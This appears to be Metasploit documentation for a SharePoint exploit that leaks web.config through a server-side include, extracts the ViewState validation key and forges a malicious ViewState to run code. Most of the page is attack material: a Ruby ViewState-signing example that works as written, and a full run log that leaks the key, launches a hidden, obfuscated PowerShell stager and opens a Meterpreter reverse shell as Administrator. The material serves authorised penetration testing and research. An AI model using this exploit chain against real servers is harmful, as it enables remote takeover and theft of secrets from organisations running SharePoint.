metasploit-framework/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md


Vulnerable Application

Description

This module exploits a server-side include (SSI) in SharePoint to leak the web.config file, extracts the ViewState validation key (the machineKey validationKey) from it, and uses that key to forge a malicious ViewState that the server deserializes.

This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint.

The web.config file is stored in loot once retrieved. If the validation key is already known (for example from a previous run), set the VALIDATION_KEY option to skip the SSI page creation and web.config leak and go straight to the ViewState deserialization.

Tested against SharePoint 2019 on Windows Server 2016.
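The two halves of the technique above, pulling the validationKey out of a leaked web.config and MAC-signing serialized ViewState bytes with it, as an added worked example. This is not the module's own code. It uses a constructed web.config fragment (the validationKey is the one leaked in the scenario below; the decryptionKey and validation="HMACSHA256" are assumptions), and it implements only ASP.NET's legacy MAC scheme: HMAC(validationKey, data || modifier), where the modifier is __VIEWSTATEGENERATOR as a little-endian uint32, appended to the data and base64-encoded. The serialized bytes stand in for a real gadget chain.

```ruby
require 'base64'
require 'openssl'
require 'rexml/document'

# Constructed sample of the <machineKey> fragment the SSI leaks from web.config.
# validationKey is the value from the scenario on this page; decryptionKey and
# the validation algorithm are assumptions for this example.
SAMPLE_WEB_CONFIG = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <configuration>
    <system.web>
      <machineKey validationKey="FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4"
                  decryptionKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                  validation="HMACSHA256" decryption="AES" />
    </system.web>
  </configuration>
XML

# machineKey validation= values that map onto an HMAC this example can produce.
DIGEST_FOR_VALIDATION = {
  'SHA1'       => 'SHA1',
  'HMACSHA256' => 'SHA256',
  'HMACSHA384' => 'SHA384',
  'HMACSHA512' => 'SHA512'
}.freeze

# Pull the validationKey and validation algorithm out of a web.config document.
def parse_machine_key(web_config_xml)
  doc  = REXML::Document.new(web_config_xml)
  node = REXML::XPath.first(doc, '//machineKey')
  raise 'web.config contains no <machineKey> element' if node.nil?
  {
    validation_key: node.attributes['validationKey'],
    validation:     node.attributes['validation'] || 'SHA1'
  }
end

# Legacy ViewState MAC modifier: __VIEWSTATEGENERATOR (hex string) as a little-endian uint32.
def viewstate_modifier(generator_hex)
  [Integer(generator_hex, 16)].pack('V')
end

# HMAC over data with the hex-encoded validationKey, using the configured algorithm.
def hmac_for(validation, key_hex, data)
  digest = DIGEST_FOR_VALIDATION.fetch(validation) do
    raise "validation=#{validation} is not an HMAC scheme this example supports"
  end
  OpenSSL::HMAC.digest(digest, [key_hex].pack('H*'), data)
end

# Sign serialized ObjectStateFormatter bytes (e.g. a gadget chain) the way the
# legacy MachineKey MAC does: HMAC(key, data || modifier) appended, then base64.
def sign_viewstate(serialized, key_hex, validation, generator_hex)
  data = serialized.b
  mac  = hmac_for(validation, key_hex, data + viewstate_modifier(generator_hex))
  Base64.strict_encode64(data + mac)
end

# Constant-time byte comparison, so a verifier does not leak the MAC via timing.
def ct_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Re-derive the MAC and compare, mirroring what the server does before deserializing.
def verify_viewstate(viewstate_b64, key_hex, validation, generator_hex)
  raw     = Base64.strict_decode64(viewstate_b64)
  mac_len = OpenSSL::Digest.new(DIGEST_FOR_VALIDATION.fetch(validation)).digest_length
  return false if raw.bytesize <= mac_len
  data = raw[0...-mac_len]
  mac  = raw[-mac_len..]
  ct_equal?(mac, hmac_for(validation, key_hex, data + viewstate_modifier(generator_hex)))
end

if $PROGRAM_NAME == __FILE__
  mk = parse_machine_key(SAMPLE_WEB_CONFIG)
  # Stand-in for serialized gadget bytes; constructed, not a real payload.
  forged = sign_viewstate("\xFF\x01\x0Bexample".b, mk[:validation_key], mk[:validation], 'CA0B0334')
  puts "__VIEWSTATE=#{forged}"
end
```

Two caveats a practitioner should keep in mind: a configured ViewStateUserKey also feeds the modifier and is not handled here, and .NET 4.5 and later can derive per-purpose keys rather than using the raw validationKey, in which case this legacy construction will not validate on the server.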

Setup

Follow Microsoft's documentation.

Verification Steps

Follow Setup and Scenarios.

Targets

Windows Command

This executes a Windows command.

Windows Dropper

This uses a Windows dropper to execute code.

PowerShell Stager

This uses a PowerShell stager to execute code.

Options

HttpUsername

Set this to the SharePoint username.

HttpPassword

Set this to the SharePoint password.

VALIDATION_KEY

Set this to the ViewState validation key if you already have it. When set, the module skips the SSI page creation and web.config leak and goes straight to the ViewState deserialization.

COOKIE

Set this to a SharePoint cookie if you have one. This is primarily useful for forms-based authentication, where HttpUsername and HttpPassword do not apply.

Scenarios

SharePoint 2019 on Windows Server 2016

msf6 > use exploit/windows/http/sharepoint_ssi_viewstate
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > options

Module options (exploit/windows/http/sharepoint_ssi_viewstate):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   COOKIE                           no        SharePoint cookie if you have one
   HttpPassword                     no        SharePoint password
   HttpUsername                     no        SharePoint username
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /                yes       Base path
   URIPATH                          no        The URI to use for this exploit (default is random)
   VALIDATION_KEY                   no        ViewState validation key
   VHOST                            no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set rhosts 192.168.123.237
rhosts => 192.168.123.237
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httpusername Administrator
httpusername => Administrator
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httppassword Passw0rd!
httppassword => Passw0rd!
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Creating page for SSI: /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully created page
[*] Leaking web.config
[+] Saved web.config to /Users/wvu/.msf4/loot/20201015131428_default_192.168.123.237_web.config_940022.txt
[+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4
[*] Deleting /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully deleted page
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Powershell command length: 2918
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''...''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: 8g4qnmlb) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62885) at 2020-10-15 13:15:00 -0500

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 18
Meterpreter     : x64/windows
meterpreter >